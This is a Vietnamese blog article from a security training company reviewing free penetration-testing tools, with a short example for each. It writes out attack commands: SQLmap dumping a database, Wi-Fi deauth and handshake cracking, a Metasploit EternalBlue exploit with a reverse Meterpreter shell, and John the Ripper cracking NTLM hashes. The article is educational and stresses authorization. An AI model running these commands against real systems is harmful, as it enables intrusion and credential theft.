Top 10 Công Cụ Pentest Miễn Phí, State-of-the-Art (Update 2025)

Trong thế giới an ninh mạng không ngừng biến động, việc sở hữu bộ công cụ pentest phù hợp giống như một samurai có thanh kiếm tốt - nó không đảm bảo chiến thắng, nhưng chắc chắn tăng cơ hội thành công của bạn. Không cần các giải pháp đắt đỏ, những công cụ mã nguồn mở, hoàn toàn miễn phí dưới đây đủ sức giúp bạn thực hiện các chiến dịch kiểm thử xâm nhập hiệu quả.

Bài viết này sẽ giới thiệu Top 10 công cụ pentest miễn phí được cập nhật đến năm 2025, được phân loại rõ ràng theo từng nhóm chức năng. Mỗi công cụ đều được phân tích chi tiết về ưu nhược điểm, với những ví dụ thực tế sát với môi trường làm việc của pentester.

Mục lục

• Công cụ Pentest Mạng - Nmap, Wireshark
• Công cụ Pentest Web - OWASP ZAP, SQLmap
• Công cụ Pentest Wireless - Aircrack-ng
• Công cụ OSINT - SpiderFoot
• Công cụ Exploitation - Metasploit Framework
• Công cụ Password Cracking - John the Ripper
• Bảng so sánh tổng quan
• Lời khuyên chọn công cụ phù hợp

Giới thiệu

Trong lĩnh vực an ninh mạng, các công cụ pentest miễn phí không chỉ tiết kiệm chi phí mà còn cung cấp sức mạnh ngang bằng với giải pháp thương mại. Từ quét mạng, phân tích gói tin, kiểm thử ứng dụng web đến khai thác lỗ hổng, mỗi công cụ trong Top 10 đều đại diện cho "state-of-the-art" 2025 trong lĩnh vực của nó.

Tại CyberJutsu, chúng tôi tin rằng việc hiểu bản chất công cụ quan trọng hơn việc chỉ biết sử dụng chúng. "Hack to learn, not learn to hack" - triết lý này giúp bạn không chỉ biết CÁCH dùng công cụ mà còn hiểu TẠI SAO chúng hoạt động như vậy, từ đó phát hiện lỗ hổng sâu sắc hơn mà các công cụ tự động không thể.

Thành thạo các công cụ này không chỉ hữu ích cho pentest chuyên nghiệp mà còn mở ra cơ hội trong lĩnh vực bug bounty - nơi bạn có thể kiếm từ vài trăm đến hàng nghìn đô la cho mỗi lỗ hổng phát hiện được. Hàng loạt công ty công nghệ lớn như Google, Microsoft, Meta đều có chương trình bug bounty hào phóng, chờ đợi những "thợ săn" tài năng.

Chúng tôi đã phân loại các công cụ theo nhóm chức năng để bạn dễ theo dõi. Mỗi phần sẽ giới thiệu một đến hai công cụ tiêu biểu kèm theo phân tích thực tế. Hãy cùng bắt đầu!

Công cụ Pentest Mạng (Network Pentesting) 🌐

Nmap

Nmap (Network Mapper) là công cụ quét cổng và khám phá mạng không thể thiếu trong arsenal của bất kỳ pentester nào. Nmap hoạt động bằng cách gửi các gói tin đặc biệt và phân tích phản hồi để phát hiện host, cổng mở và dịch vụ đang chạy.

Chức năng chính:

• Quét cổng (TCP/UDP)
• Phát hiện hệ điều hành
• Nhận dạng phiên bản dịch vụ
• Vẽ bản đồ mạng
• NSE (Nmap Scripting Engine) với hàng trăm script kiểm tra lỗ hổng

Ưu điểm:

• Linh hoạt với nhiều tùy chọn scan và kịch bản
• Đa nền tảng (Windows, Linux, macOS)
• Hoàn toàn miễn phí và mã nguồn mở
• Cộng đồng lớn, tài liệu phong phú

Nhược điểm:

• Giao diện dòng lệnh (Zenmap GUI chỉ hỗ trợ một phần)
• Quét tạo nhiều log, dễ bị phát hiện
• Cần kiến thức để phân tích kết quả hiệu quả

Ví dụ thực tế: Trong buổi kiểm thử mạng doanh nghiệp, pentester có thể dùng lệnh nmap -sV -A 192.168.1.0/24 để phát hiện tất cả thiết bị trong mạng, liệt kê dịch vụ và phiên bản. Kết quả hiển thị một máy chủ Windows đang chạy SMB trên cổng 445 với phiên bản dễ bị tấn công, tạo tiền đề cho việc khai thác tiếp theo.

Tip từ CyberJutsu: Khi học Nmap, đừng cố nhớ tất cả tham số. Thay vào đó, hãy hiểu logic đằng sau các loại quét. Ví dụ, -sS (SYN scan) hoạt động khác với -sT (TCP connect scan) như thế nào, và khi nào nên dùng cái nào.

Wireshark

Wireshark là trình phân tích giao thức mạng mã nguồn mở hàng đầu, giúp bạn "nhìn thấu" mọi gói tin đang lưu chuyển trên mạng. Wireshark cho phép bạn chụp và phân tích chi tiết từng gói tin - đây là công cụ được coi là "kính hiển vi" trong mạng máy tính.

Chức năng chính:

• Chụp gói tin theo thời gian thực
• Bộ lọc mạnh mẽ để tìm đúng dữ liệu cần thiết
• Hỗ trợ hàng trăm giao thức
• Tái kết hợp luồng TCP/UDP để phân tích phiên
• Xuất đối tượng (file, hình ảnh) từ luồng dữ liệu

Ưu điểm:

• Phân tích cực kỳ chi tiết đến từng bit dữ liệu
• Giao diện trực quan với bộ lọc mạnh
• Đa nền tảng, được các chuyên gia tin dùng
• Cộng đồng hỗ trợ lớn và liên tục cập nhật

Nhược điểm:

• Lượng thông tin lớn, dễ gây ngợp cho người mới
• Chỉ phân tích thụ động, không cảnh báo tự động
• Đòi hỏi kiến thức mạng sâu để khai thác tối đa

Ví dụ thực tế: Sau khi khai thác được quyền truy cập vào mạng nội bộ, pentester dùng Wireshark bắt gói tin trên segment đó. Nhờ filter http contains "password", họ phát hiện một ứng dụng nội bộ đang gửi thông tin đăng nhập dạng plaintext - một phát hiện nghiêm trọng cần báo cáo ngay.

Hiểu biết sâu về Wireshark không chỉ giúp bạn trong pentest, mà còn vô giá khi debug vấn đề mạng phức tạp - kỹ năng được rất nhiều nhà tuyển dụng săn đón.

Công cụ Pentest Web (Web Application Pentesting) 🌍

OWASP ZAP

OWASP ZAP (Zed Attack Proxy) là công cụ quét lỗ hổng ứng dụng web mã nguồn mở do OWASP duy trì. ZAP hoạt động như một proxy chặn giữa trình duyệt và ứng dụng web để phân tích, sửa đổi request/response và phát hiện lỗ hổng.

Chức năng chính:

• Intercepting Proxy (chặn và sửa đổi HTTP/HTTPS)
• Automated Scanner (quét thụ động & chủ động)
• Spider/Crawler (thu thập nội dung web)
• Fuzzer (thử các dữ liệu ngẫu nhiên để tìm lỗi)
• Hỗ trợ API để tích hợp vào quy trình CI/CD

Ưu điểm:

• Miễn phí 100% và được OWASP bảo trợ
• Tính năng toàn diện từ quét tự động đến công cụ thủ công
• Hỗ trợ cả người mới (dễ dùng) lẫn chuyên gia (tùy biến sâu)
• Tích hợp tốt vào quy trình DevSecOps

Nhược điểm:

• Giao diện UX chưa mượt bằng công cụ thương mại như Burp Suite
• Cần bổ sung plugin cho một số chức năng nâng cao
• Tốc độ quét đôi lúc chậm hơn giải pháp trả phí

Ví dụ thực tế: Khi pentest một ứng dụng web nội bộ, pentester cấu hình trình duyệt qua ZAP Proxy, sử dụng Spider để thu thập mọi URL và tham số, sau đó chạy Active Scan trên toàn bộ ứng dụng. ZAP phát hiện một lỗ hổng Cross-Site Scripting (XSS) Stored nghiêm trọng trong form đăng ký người dùng, cho phép chèn và thực thi mã JavaScript vào trang.

Một thợ săn bug bounty đã sử dụng chính ZAP để phát hiện lỗ hổng IDOR (Insecure Direct Object Reference) trên một nền tảng thương mại điện tử lớn, cho phép truy cập trái phép vào thông tin đơn hàng của người dùng khác. Sau khi báo cáo, anh nhận được phần thưởng $5,000 - minh chứng cho giá trị của công cụ miễn phí này trong tay người biết cách sử dụng nó.

Khi học Web Pentest, hiểu sâu về cơ chế hoạt động của các lỗ hổng quan trọng hơn việc chỉ biết chạy tool. Hãy thử xây dựng labs tự tạo lỗ hổng để hiểu bản chất của từng vấn đề. Trong khóa Web Pentest của CyberJutsu, chúng tôi tập trung vào cách "Hack để hiểu" - giúp bạn không chỉ phát hiện mà còn nắm vững nguyên nhân sâu xa của từng lỗ hổng.

SQLmap

SQLmap là công cụ mã nguồn mở chuyên tự động phát hiện và khai thác lỗ hổng SQL Injection. SQLmap có thể tự phát hiện loại database và thực hiện một loạt các kỹ thuật khai thác từ trích xuất dữ liệu đến chiếm quyền điều khiển server.

Chức năng chính:

• Tự động phát hiện và khai thác SQL Injection
• Hỗ trợ nhiều loại DB (MySQL, MSSQL, Oracle, PostgreSQL...)
• Trích xuất dữ liệu database
• Thực thi câu lệnh SQL tùy ý và thậm chí lấy shell
• Bypass WAF (Web Application Firewall)

Ưu điểm:

• Tự động và thông minh - tiết kiệm thời gian pentester
• Hỗ trợ nhiều loại SQLi và cơ sở dữ liệu
• Dễ sử dụng dù qua dòng lệnh
• Liên tục cập nhật các kỹ thuật mới

Nhược điểm:

• Không có GUI (chỉ command-line)
• Hoạt động gây nhiều log, không "lén lút"
• Trường hợp phức tạp vẫn cần hiểu biết thủ công

Ví dụ thực tế: Pentester phát hiện tham số id trên URL nghi ngờ dính SQL Injection. Thay vì thử thủ công, họ chạy:

sqlmap -u "http://target.com/products.php?id=1" --batch --dump

SQLmap tự xác định tham số dính lỗi dạng Union-based, tìm cấu trúc database, và trích xuất toàn bộ thông tin người dùng cùng hash mật khẩu - một phát hiện nghiêm trọng cần khắc phục ngay.

Công cụ Pentest Wireless (Wireless Security) 📡

Aircrack-ng

Aircrack-ng là bộ công cụ đánh giá bảo mật mạng Wi-Fi (802.11), bao gồm nhiều thành phần: airodump-ng (quét/thu thập gói tin), aireplay-ng (tấn công/inject gói), aircrack-ng (crack WEP/WPA)...

Chức năng chính:

• Kiểm tra card Wi-Fi có hỗ trợ monitor/injection
• Quét mạng Wi-Fi để tìm SSID, MAC AP, client kết nối
• Bắt bắt tay (handshake) WPA bằng kỹ thuật deauth
• Crack mật khẩu Wi-Fi (WEP/WPA/WPA2)

Ưu điểm:

• Bộ công cụ toàn diện cho kiểm thử Wi-Fi
• Hỗ trợ đa nền tảng (Linux, Windows, macOS)
• Thuật toán crack hiệu quả, cộng đồng sử dụng rộng rãi

Nhược điểm:

• Chỉ dùng cho mạng Wi-Fi 802.11
• Yêu cầu card Wi-Fi hỗ trợ monitor mode và injection
• Crack WPA2 phức tạp đòi hỏi thời gian và từ điển tốt

Ví dụ thực tế: Một chuyên gia bảo mật kiểm tra mạng Wi-Fi văn phòng. Họ dùng airodump-ng quét và phát hiện mạng đang dùng WPA2-PSK. Sau đó, chạy aireplay-ng --deauth để ngắt kết nối một thiết bị, buộc nó bắt tay lại với AP, đồng thời bắt được handshake. Tiếp theo, dùng aircrack-ng -w wordlist.txt handshake.cap để thử các mật khẩu phổ biến. Nếu mật khẩu yếu (ví dụ "Office2025"), aircrack-ng sẽ tìm ra nhanh chóng - chứng minh cần tăng cường bảo mật.

Khi pentester Wi-Fi, hãy nhớ bảo vệ bản thân: luôn hoạt động trong phạm vi được phép, có văn bản cho phép từ chủ sở hữu mạng. Một sai lầm có thể dẫn đến hậu quả pháp lý nghiêm trọng.

Công cụ OSINT (Open-Source Intelligence) 🔍

SpiderFoot

SpiderFoot là công cụ tự động hóa OSINT mạnh mẽ, có thể thu thập thông tin từ hơn 200 nguồn dữ liệu công khai về tên miền, địa chỉ IP, email, username và nhiều mục tiêu khác.

Chức năng chính:

• Thu thập dữ liệu tự động từ hàng trăm nguồn
• Phân tích mối liên kết giữa các thông tin
• Hiển thị biểu đồ quan hệ trực quan
• Hỗ trợ xuất báo cáo chi tiết

Ưu điểm:

• Tự động hóa cao, tiết kiệm thời gian
• Tích hợp nhiều nguồn OSINT (DNS, WHOIS, mạng xã hội, dữ liệu rò rỉ...)
• Giao diện web thân thiện, dễ lọc kết quả

Nhược điểm:

• Một số module cần API key (dù nhiều có free tier)
• Kết quả đồ sộ, cần người dùng lọc thông tin hữu ích
• Scan sâu có thể tốn thời gian, bị giới hạn bởi rate limit API

Ví dụ thực tế: Trước khi bắt đầu pentest, chuyên gia chạy SpiderFoot scan domain example.com. Công cụ tìm được nhiều subdomain không nằm trong scope ban đầu (dev.example.com, staging.example.com...), email nhân viên CNTT (tiềm năng cho phishing test), địa chỉ IP công khai và thông qua module Shodan, phát hiện một server cũ mở cổng Remote Desktop. Tất cả giúp pentester mở rộng đáng kể bề mặt tấn công tiềm năng mà không phải gửi một gói tin nào đến mục tiêu.

Công cụ Exploitation (Khai thác lỗ hổng) 🛠️

Metasploit Framework

Metasploit Framework là nền tảng mã nguồn mở hỗ trợ phát triển, kiểm thử và thực thi mã khai thác. Framework này bao gồm bộ sưu tập hàng trăm exploit cho các lỗ hổng đã biết, kèm theo payload, encoder và các công cụ hỗ trợ.

Chức năng chính:

• Khai thác lỗ hổng với hàng trăm exploit có sẵn
• Tạo payload tùy biến (backdoor, trojan...)
• Post-exploitation (dump hash, keylog, privilege escalation...)
• Scan lỗ hổng với các module auxiliary

Ưu điểm:

• Framework khai thác toàn diện, nhiều module
• Phổ biến, được hầu hết pentester sử dụng
• Dễ dàng tùy biến, tích hợp với công cụ khác
• Cộng đồng lớn, tài liệu chi tiết

Nhược điểm:

• Payload mặc định dễ bị AV/EDR phát hiện
• Giao diện dòng lệnh, cần thời gian học
• Có thể bị lạm dụng nếu thiếu hiểu biết đúng đắn

Ví dụ thực tế: Sau khi Nmap phát hiện máy Windows mở cổng 445 và dính lỗ hổng SMB, pentester mở Metasploit (msfconsole), dùng lệnh:

use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.5 exploit

Metasploit thực thi exploit, và nhận được session Meterpreter với quyền SYSTEM. Từ đây, pentester dump hash mật khẩu, thiết lập route tấn công sâu hơn vào mạng nội bộ - minh chứng cho lỗ hổng nghiêm trọng cần vá ngay.

Tại CyberJutsu, chúng tôi dạy rằng hiểu bản chất exploit quan trọng hơn việc "click click" qua interface. Trong khóa Exploit 101, học viên được đào sâu về cơ chế hoạt động thực sự của các lỗ hổng và cách khai thác, giúp bạn không chỉ biết "làm như thế nào" mà còn "tại sao lại như vậy".

Công cụ Password Cracking 🔐

John the Ripper

John the Ripper (JtR) là một trong những công cụ bẻ khóa mật khẩu miễn phí phổ biến nhất. John kết hợp nhiều phương pháp crack trong một công cụ duy nhất và hỗ trợ hàng trăm định dạng hash.

Chức năng chính:

• Crack mật khẩu từ hash bằng nhiều phương pháp (từ điển, rule, brute-force)
• Hỗ trợ hàng trăm định dạng hash (Windows, Linux, Web, v.v.)
• Tùy biến rule để biến đổi từ điển
• Hỗ trợ crack mật khẩu Wi-Fi, file mã hóa

Ưu điểm:

• Linh hoạt cao, "một gói nhiều tool" kết hợp
• Tùy biến mạnh (viết rule riêng, thêm format)
• Đa nền tảng, hỗ trợ GPU (qua phiên bản Jumbo)
• Cộng đồng lâu năm, wordlist tối ưu

Nhược điểm:

• Giao diện dòng lệnh, khó cho người mới
• Bản chuẩn dùng CPU, tốc độ chậm với hash mạnh
• Chỉ tập trung vào crack mật khẩu

Ví dụ thực tế: Trong pentest Active Directory, pentester thu được file hash NTLM người dùng. Họ chạy:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

John tìm ra một số mật khẩu đơn giản như Summer2025!, cho phép pentester đăng nhập hệ thống, tiến hành leo thang đặc quyền. Kết quả này là bằng chứng rõ ràng về chính sách mật khẩu yếu cần được tăng cường.

Bảng so sánh ưu và nhược điểm

Công cụ Ưu điểm chính Nhược điểm chính Nmap Quét, phát hiện dịch vụ toàn diện; NSE script phong phú Quét gây nhiều log; cần kỹ năng phân tích kết quả Wireshark Phân tích gói tin chi tiết; bộ lọc mạnh Dữ liệu quá lớn; chỉ phân tích thụ động OWASP ZAP Scan web toàn diện; proxy; miễn phí hoàn toàn UI chưa bằng tool thương mại; cần plugin bổ sung SQLmap Tự động khai thác SQLi; hỗ trợ nhiều DB Không GUI; hoạt động ồn ào; cần kiến thức bổ sung Metasploit Framework exploit đồ sộ; nhiều module; post-exploitation Payload dễ bị phát hiện; cần thời gian học John the Ripper Hỗ trợ nhiều hash; rule linh hoạt; cộng đồng lớn Giao diện dòng lệnh; phụ thuộc CPU; chỉ crack mật khẩu Aircrack-ng Bộ tool Wi-Fi đầy đủ; đa nền tảng Chỉ dùng cho Wi-Fi; cần card hỗ trợ monitor mode SpiderFoot Thu thập OSINT tự động từ 100+ nguồn; giao diện web Cần API keys; kết quả cần phân tích thủ công Autopsy Nền tảng forensics mạnh; miễn phí; nhiều module Tốn tài nguyên; chỉ phục vụ điều tra, không tấn công Trivy Scanner container/code/IaC đa năng; dễ tích hợp CI/CD Chỉ phát hiện lỗi đã biết; có false positive

Lời khuyên chọn công cụ pentest phù hợp

Với danh sách 10 công cụ hàng đầu ở trên, làm thế nào để chọn được công cụ phù hợp nhất cho nhu cầu của bạn? Dưới đây là một số lời khuyên thực tế:

1. Xác định mục tiêu pentest cụ thể:

• Pentest mạng: Bắt đầu với Nmap để do thám, sau đó dùng Wireshark khi cần phân tích gói tin chi tiết.
• Pentest web: Mở đầu với OWASP ZAP để scan tổng thể, dùng SQLmap khi phát hiện tham số nghi ngờ SQLi.
• Pentest Wi-Fi: Aircrack-ng là lựa chọn số 1 cho Wi-Fi (nhớ chuẩn bị adapter hỗ trợ tốt).
• Giai đoạn thu thập thông tin: SpiderFoot giúp thu thập nhanh thông tin về mục tiêu.
• Khai thác và pivot: Metasploit là framework khai thác toàn diện nhất.

2. Kết hợp nhiều công cụ để bổ trợ lẫn nhau: Không có công cụ nào hoàn hảo cho mọi tình huống. Một bài pentest thực tế thường cần kết hợp nhiều công cụ: dùng Nmap phát hiện host và dịch vụ -> Metasploit khai thác lỗ hổng -> John the Ripper crack mật khẩu -> và có thể kết thúc bằng Trivy kiểm tra container nếu cần thiết.

3. Luyện tập trong môi trường lab an toàn: Trước khi áp dụng vào dự án thực, hãy thực hành trên môi trường lab như TryHackMe, HackTheBox, hoặc Metasploitable. Điều này giúp bạn thành thạo công cụ và hiểu rõ ưu nhược điểm.

4. Cập nhật công cụ và kiến thức liên tục: Lĩnh vực bảo mật thay đổi nhanh chóng. Hãy luôn cập nhật phiên bản mới nhất của công cụ và theo dõi các nguồn tin như blog OWASP, diễn đàn GitHub để nắm bắt tính năng mới, kỹ thuật mới.

"Trong pentest, không phải công cụ mạnh nhất, mà là sự kết hợp thông minh giữa công cụ và tư duy hacker mới là chìa khóa thành công." - CyberJutsu

Nếu bạn muốn nâng cao kỹ năng pentest thực chiến, khóa học Web Pentest và Exploit 101 của CyberJutsu sẽ giúp bạn không chỉ thành thạo các công cụ trên mà còn hiểu sâu về bản chất của từng lỗ hổng - điều mà chỉ thông qua tự học công cụ khó có thể đạt được.

Kết luận

Top 10 công cụ pentest miễn phí kể trên đại diện cho những gì tốt nhất và tiên tiến nhất đến năm 2025 trong từng mảng pentest. Việc thành thạo những công cụ này sẽ tăng cường sức mạnh cho bạn - giúp bạn làm việc hiệu quả hơn, khám phá nhiều lỗ hổng hơn và học hỏi được nhiều kiến thức hơn về an ninh mạng.

Nhiều thợ săn bug bounty hàng đầu thế giới đã chứng minh rằng không cần công cụ đắt tiền vẫn có thể đạt được thành công. Với bộ công cụ miễn phí này cùng kiến thức sâu sắc, bạn hoàn toàn có thể bắt đầu hành trình của mình trong cả pentest chuyên nghiệp lẫn bug bounty - nơi những phát hiện giá trị có thể mang lại phần thưởng từ vài nghìn đến hàng chục nghìn đô la.

Nhưng quan trọng hơn cả, hãy nhớ rằng pentest không chỉ là về công cụ, mà còn về tư duy của người kiểm thử. Công cụ chỉ là phương tiện để hiện thực hóa ý tưởng của bạn. Tại CyberJutsu, chúng tôi luôn nhấn mạnh triết lý "Learning by Breaking - Phá vỡ để thấu hiểu!" - chỉ khi thật sự hiểu bản chất, bạn mới có thể vượt qua giới hạn của công cụ và trở thành pentester đẳng cấp.

Chúc bạn thành công trên con đường trở thành một pentester chuyên nghiệp!

Tài liệu tham khảo

• "Top 16 Nmap Commands: Nmap Port Scan Cheat Sheet" - Recorded Future
• "Wireshark — Security Onion Documentation 2.4 documentation"
• "SecTools.Org Top Network Security Tools"
• "23 Top Open Source Penetration Testing Tools" - eSecurityPlanet
• "Top 15 Free OSINT Tools To Collect Data From Open Sources" - Recorded Future
• "15 Best OSINT (Open Source Intelligence) Tools for 2025" - Talkwalker
• "Autopsy - Digital Forensics"
• "Trivy Open Source Vulnerability Scanner" - Aqua
• "Open source container scanning tool to find vulnerabilities" - Reddit